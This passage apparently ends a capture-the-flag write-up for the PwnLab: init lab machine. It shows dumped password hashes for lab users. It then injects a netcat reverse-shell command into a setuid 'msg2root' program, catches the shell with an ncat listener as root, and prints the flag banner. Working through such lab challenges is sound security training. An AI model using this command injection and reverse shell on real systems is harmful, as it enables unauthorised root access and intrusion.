mike:$6$M5sGQVYv$0Xjlw9v/AdxlrQEhdiYJxNMQGHQi6HLbwO9nW8wExgu9fgPu3xbUQ9relK0rcbOH4nJASrxyPfQhBuDjOxvk20:16877:0:99999:7::: kane:$6$gEXef6Vu$iFd0ZnRpBJSxtiztGUqSbWAmw975zfUVIcXhyZkxRkpg59Gk37fCY.26DqADXLO9imM4vV8HF9L9a.0PXV3ec.:16877:0:99999:7::: mysql:!:16877:0:99999:7::: mike@pwnlab:/home/mike$ ./msg2root ./msg2root Message for root: marjaba;/bin/nc 192.168.43.3 4446 -e /bin/sh marjaba;/bin/nc 192.168.43.3 4446 -e /bin/sh marjaba
Getting a root shell and capturing the flag:
[gandosha@GandoPC 192.168.43.4]$ ncat -lvnp 4446
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4446
Ncat: Listening on 0.0.0.0:4446
Ncat: Connection from 192.168.43.4.
Ncat: Connection from 192.168.43.4:52273.
python -c 'import pty;pty.spawn("/bin/sh")'
# whoami;ls -l
whoami;ls -l
root
total 8
-rwsr-sr-x 1 root root 5364 Mar 17 2016 msg2root
# cd /root;ls -l
cd /root;ls -l
total 4
---------- 1 root root 1840 Mar 17 2016 flag.txt
lrwxrwxrwx 1 root root 9 Mar 17 2016 messages.txt -> /dev/null
# cat flag.txt
cat flag.txt
.-=~=-. .-=~=-.
(__ _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__ _)
(_ ___) _____ _ (_ ___)
(__ _) / __ \ | | (__ _)
( _ __) | / \/ ___ _ __ __ _ _ __ __ _| |_ ___ ( _ __)
(__ _) | | / _ \| '_ \ / _` | '__/ _` | __/ __| (__ _)
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \ (_ ___)
(__ _) \____/\___/|_| |_|\__, |_| \__,_|\__|___/ (__ _)
( _ __) __/ | ( _ __)
(__ _) |___/ (__ _)
(__ _) (__ _)
(_ ___) If you are reading this, means that you have break 'init' (_ ___)
( _ __) Pwnlab. I hope you enjoyed and thanks for your time doing ( _ __)
(__ _) this challenge. (__ _)
(_ ___) (_ ___)
( _ __) Please send me your feedback or your writeup, I will love ( _ __)
(__ _) reading it (__ _)
(__ _) (__ _)
(__ _) For sniferl4bs.com (__ _)
( _ __) claor@PwnLab.net - @Chronicoder ( _ __)
(__ _) (__ _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-' `-._.-'
#